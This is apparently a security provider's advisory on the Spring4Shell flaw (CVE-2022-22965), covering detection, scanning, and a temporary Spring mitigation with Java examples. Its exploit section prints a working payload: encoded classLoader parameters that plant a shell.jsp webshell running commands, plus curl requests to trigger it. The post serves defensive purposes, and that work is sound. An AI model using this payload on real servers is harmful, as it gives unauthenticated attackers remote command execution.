
Spring4Shell Detection & Mitigation CVE-2022-22965

Description

Spring4Shell, or CVE-2022-22965, is an RCE (remote code execution) flaw in the Spring Framework. Spring, as it is commonly known, is an open-source application framework that provides infrastructure support for developing Java applications. Basically, it helps you write Java applications. According to https://spring.io:

“…Spring is infrastructural support at the application level: Spring focuses on the “plumbing” of enterprise applications so that teams can focus on application-level business logic, without unnecessary ties to specific deployment environments.”

Currently, all versions of Spring are impacted, but the web application must be running on JDK version 9 (the local Java installation) for the application to be vulnerable.

The application must also be running on top of Apache Tomcat.

The impact here is that an application running on a web server will have certain permissions. Those permissions vary greatly, depending on how the application is built and installed. You should always assume that the web service is running with root privileges until proven otherwise. With that in mind, this remote code execution vulnerability would allow an unauthenticated attacker to run commands on the underlying web server with the permissions of the web service.

Image 1: Bad bad bad!

Detecting Exploitation

Understanding the Exploit

The vulnerability relies on the ability to traverse the properties of a java class from a query parameter and locate a file that the attacker can both write to and has meaning to the execution of the program.

You would then make a request like this:

curl 'http://localhost:8080/spring4shell?class.module.classLoader.resources.context.parent.pipeline.first.pattern=test'

Example exploit code:

class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bprefix%7Di%20java.io.InputStream%20in%20%3D%20%25%7Bc%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%25%7Bsuffix%7Di

class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp

class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT

class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell

class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=

The above creates a file called shell.jsp in the webapps/ROOT folder. One final command can be used to exploit the vulnerability:

curl http://localhost:8080/shell.jsp?cmd=whoami

Understanding Detection

Filename/Web Shell
The initial PoC used a filename called tomcatwar.jsp; however, this is trivial to change, so any new .jsp files should be scrutinized.

Log sources: Web server OS-level logs, Web server (e.g. Apache Tomcat) logs, EDR logs


POST Requests
It may be possible to detect exploitation by inspecting POST requests. Look for requests that contain class.module.classLoader.resources.context.parent.pipeline.first in the URL.

More generically, looking for *.jsp or *.class* may also help with detection.

Log sources: Web server (e.g. Apache Tomcat) logs
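
The two checks above (the classLoader property chain in the request and requests for .jsp files that were never deployed) as an added example, not code from the original post. It is a small Java scanner over Tomcat access-log lines in the "common" format and assumes JDK 10+ (for URLDecoder.decode with a Charset); the log lines, addresses and the class name Spring4ShellLogScan are constructed for the example.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

// Added example, not part of the original post: flags the Spring4Shell
// indicators described in the text in Tomcat access-log lines.
// Requires JDK 10+ for URLDecoder.decode(String, Charset).
// All log lines in main() are constructed sample data.
public class Spring4ShellLogScan {

    // Tomcat "common" pattern: host ident user [date] "METHOD path protocol" status bytes
    private static final Pattern ACCESS_LINE = Pattern.compile(
        "^(\\S+) \\S+ \\S+ \\[([^\\]]+)\\] \"(\\S+) (\\S+)[^\"]*\" (\\d{3})");

    // Start of the property chain the PoC writes through, matched after
    // percent-decoding and case-insensitively
    private static final Pattern CLASSLOADER_CHAIN = Pattern.compile(
        "(?i)class\\.module\\.classLoader");

    // Any .jsp requested directly, with or without a query string
    private static final Pattern JSP_REQUEST = Pattern.compile("(?i)\\.jsp(\\?|$)");

    /** Percent-decode until the string stops changing (max 3 rounds), so a
     *  double-encoded chain such as %2563lass... is still caught. */
    static String decodeRepeatedly(String s) {
        String current = s;
        for (int i = 0; i < 3; i++) {
            String next;
            try {
                next = URLDecoder.decode(current, StandardCharsets.UTF_8);
            } catch (IllegalArgumentException e) {
                return current; // malformed %-escape: keep what we have
            }
            if (next.equals(current)) {
                break;
            }
            current = next;
        }
        return current;
    }

    /** Returns one alert per suspicious line; lines that match neither check produce nothing. */
    static List<String> scan(List<String> lines) {
        List<String> alerts = new ArrayList<>();
        for (String line : lines) {
            Matcher m = ACCESS_LINE.matcher(line);
            if (!m.find()) {
                continue; // not an access-log line in the expected format
            }
            String src = m.group(1);
            String method = m.group(3);
            String rawPath = m.group(4);
            String status = m.group(5);
            String path = decodeRepeatedly(rawPath);

            if (CLASSLOADER_CHAIN.matcher(path).find()) {
                alerts.add("[HIGH] classLoader property write attempt from " + src
                    + ": " + method + " " + rawPath + " -> " + status);
            } else if (JSP_REQUEST.matcher(path).find()) {
                // A 200 for a .jsp nobody deployed is the post-exploitation signal
                alerts.add("[REVIEW] JSP requested from " + src + ": " + method + " " + path
                    + " -> " + status + " (confirm the file is expected)");
            }
        }
        return alerts;
    }

    public static void main(String[] args) {
        // Constructed sample lines: two property writes (one percent-encoded),
        // one webshell call, one benign request
        List<String> sample = Arrays.asList(
            "203.0.113.5 - - [31/Mar/2022:10:15:02 +0000] \"GET /spring4shell?class.module.classLoader.resources.context.parent.pipeline.first.pattern=test HTTP/1.1\" 200 12",
            "203.0.113.5 - - [31/Mar/2022:10:15:09 +0000] \"POST /spring4shell?%63lass.module.%63lassLoader.resources.context.parent.pipeline.first.suffix=.jsp HTTP/1.1\" 200 12",
            "203.0.113.5 - - [31/Mar/2022:10:15:30 +0000] \"GET /shell.jsp?cmd=whoami HTTP/1.1\" 200 48",
            "198.51.100.7 - - [31/Mar/2022:10:16:00 +0000] \"GET /index.html HTTP/1.1\" 200 1024");
        for (String alert : scan(sample)) {
            System.out.println(alert);
        }
    }
}
```

Two caveats when running this against real logs. Tomcat's default access log records only the request line, so property writes sent in a POST body rather than the query string will not appear in it; catching those needs the body captured at a reverse proxy or WAF. And the decode step matters: the property names are compared after percent-decoding because an encoded letter anywhere in class.module.classLoader would otherwise slip past a plain substring match.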


Yara Rule
This yara rule is designed to detect JSP webshells and in particular references the possibility to detect webshells found after exploiting the Spring4Shell PoC:
https://github.com/Neo23x0/signature-base/blob/master/yara/expl_spring4shell.yar


SecurIT360 SOC Managed Services

If you utilize our SOC Managed Services, here are the actions we are taking to help detect this activity:

MDR Services

  • There is an MDR rule in place looking for traffic associated with known IP addresses, which we are pulling from a GreyNoise Trends list.
  • A firewall block list is available if you would like to proactively block these IPs at your firewall – https://www.greynoise.io/viz/tag/spring-core-rce-attempt.
  • Nessus has released some plugins to help detect systems vulnerable to this exploit and we have incorporated these into your External Vulnerability Scans over the weekend. If we detect internet facing vulnerable systems in your environment, we will contact you directly.

EDR Services

  • We have incorporated known IOC information to help with detection, if we see activity related to this exploit, we will contact you directly.

Vulnerability Discovery

Here we are identifying affected systems.

For Nessus plugin ID 159374, “Spring Framework < 5.2.20 / 5.3.x < 5.3.18 Remote Code Execution (CVE-2022-22965),” users are required to enable the “Show potential false alarms” setting, also known as paranoid mode, in their scan policy in order to enable this plugin in a scan. In addition, the “Perform thorough tests” setting must be enabled as well.

We also recommend enabling only this specific plugin in a paranoid scan. Scan policies configured to have all plugins enabled will see an increase in the number of triggers, as it will include all paranoid plugins during the scan.

Enabling Paranoid and Thorough Tests Modes

To enable this setting for Nessus and Tenable.io users:

  1. Click Assessment > General > Accuracy
  2. Enable the “Show potential false alarms” option
  3. Enable the “Perform thorough tests (may disrupt your network or impact scan speed)” option

Plugin ID 159374 is available in feed serial 202203311743.

Mitigation

Patch
Temporary mitigation

To apply the temporary mitigation, applications could extend RequestMappingHandlerAdapter to update the WebDataBinder at the end after all other initialization. In order to do that, a Spring Boot application can declare a WebMvcRegistrations bean (Spring MVC) or a WebFluxRegistrations bean (Spring WebFlux). More details here: https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement
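
The workaround described above, as an added example rather than code from the post: it follows the approach in the linked Spring announcement (a WebMvcRegistrations bean that supplies a RequestMappingHandlerAdapter whose data binders disallow class.* style fields) and assumes a Spring Boot 2.x application on the servlet (Spring MVC) stack. The class names Spring4ShellWorkaroundConfig and HardenedRequestMappingHandlerAdapter are placeholders chosen for this example.

```java
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collections;
import java.util.List;

import org.springframework.boot.autoconfigure.web.servlet.WebMvcRegistrations;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.web.bind.ServletRequestDataBinder;
import org.springframework.web.context.request.NativeWebRequest;
import org.springframework.web.method.annotation.InitBinderDataBinderFactory;
import org.springframework.web.method.support.InvocableHandlerMethod;
import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter;
import org.springframework.web.servlet.mvc.method.annotation.ServletRequestDataBinderFactory;

// Added example, not the post's or Spring's own code: applies the temporary
// mitigation from the linked announcement to a Spring Boot 2.x / Spring MVC app.
// Class names are placeholders. Patching to a fixed Spring release is still required.
@Configuration
public class Spring4ShellWorkaroundConfig {

    // Spring Boot picks this bean up and uses the adapter it returns instead of
    // the auto-configured one
    @Bean
    public WebMvcRegistrations mvcRegistrations() {
        return new WebMvcRegistrations() {
            @Override
            public RequestMappingHandlerAdapter getRequestMappingHandlerAdapter() {
                return new HardenedRequestMappingHandlerAdapter();
            }
        };
    }

    static class HardenedRequestMappingHandlerAdapter extends RequestMappingHandlerAdapter {

        // Every request data binder is created through this factory, so the
        // disallowed-field patterns are applied to all controllers at once
        @Override
        protected InitBinderDataBinderFactory createDataBinderFactory(List<InvocableHandlerMethod> methods) {
            return new ServletRequestDataBinderFactory(methods, getWebBindingInitializer()) {
                @Override
                protected ServletRequestDataBinder createBinderInstance(
                        Object target, String name, NativeWebRequest request) throws Exception {
                    ServletRequestDataBinder binder = super.createBinderInstance(target, name, request);

                    // Keep whatever is already disallowed and add the class-property
                    // patterns; "*.class.*" covers nested paths such as foo.class.module
                    String[] existing = binder.getDisallowedFields();
                    List<String> fields = new ArrayList<>(
                        existing != null ? Arrays.asList(existing) : Collections.emptyList());
                    fields.addAll(Arrays.asList("class.*", "Class.*", "*.class.*", "*.Class.*"));
                    binder.setDisallowedFields(fields.toArray(new String[0]));
                    return binder;
                }
            };
        }
    }
}
```

One check worth making after adding this: any @InitBinder method in your controllers that calls setDisallowedFields with its own list runs after the binder is created and replaces the list, so those methods must append to binder.getDisallowedFields() rather than overwrite it, or the patterns above are silently lost for that controller.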

Resources
